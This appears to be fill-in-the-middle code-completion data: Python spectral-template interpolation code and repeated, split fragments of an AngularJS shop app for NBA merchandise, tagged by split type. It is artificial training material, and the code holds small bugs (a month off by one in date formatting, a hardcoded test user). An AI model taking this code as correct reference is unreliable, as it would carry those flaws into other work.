assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
| function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
self.K.unit = y_unit
self.scale.unit = 1 / x_unit
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data | # Make the dictionary of parameters
function_definition = collections.OrderedDict()
| random_line_split |
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
//设置post请求的响应头部
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
//设置根控制器
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
//跳转到该路由时先判断屏幕宽度;
$rootScope.userId=1;//用来保存用户的id;
$rootScope.userName="lijun";//用户名;后续功能完善后在删除
$rootScope.pclass="";//查询商品类别;
$rootScope.searchMsg={};//查询信息
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];//分页数字数组
$rootScope.len=8;//每页记录数
$rootScope.proList=[];//保存商品列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
| "$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| }else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope", | conditional_block |
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
//设置post请求的响应头部
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
//设置根控制器
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
//跳转到该路由时先判断屏幕宽度;
$rootScope.userId=1;//用来保存用户的id;
$rootScope.userName="lijun";//用户名;后续功能完善后在删除
$rootScope.pclass="";//查询商品类别;
$rootScope.searchMsg={};//查询信息
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];//分页数字数组
$rootScope.len=8;//每页记录数
$rootScope.proList=[];//保存商品列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_body |
||
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
//设置post请求的响应头部
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
//设置根控制器
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
//跳转到该路由时先判断屏幕宽度;
$rootScope.userId=1;//用来保存用户的id;
$rootScope.userName="lijun";//用户名;后续功能完善后在删除
$rootScope.pclass="";//查询商品类别;
$rootScope.searchMsg={};//查询信息
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];//分页数字数组
$rootScope.len=8;//每页记录数
$rootScope.proList=[];//保存商品列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
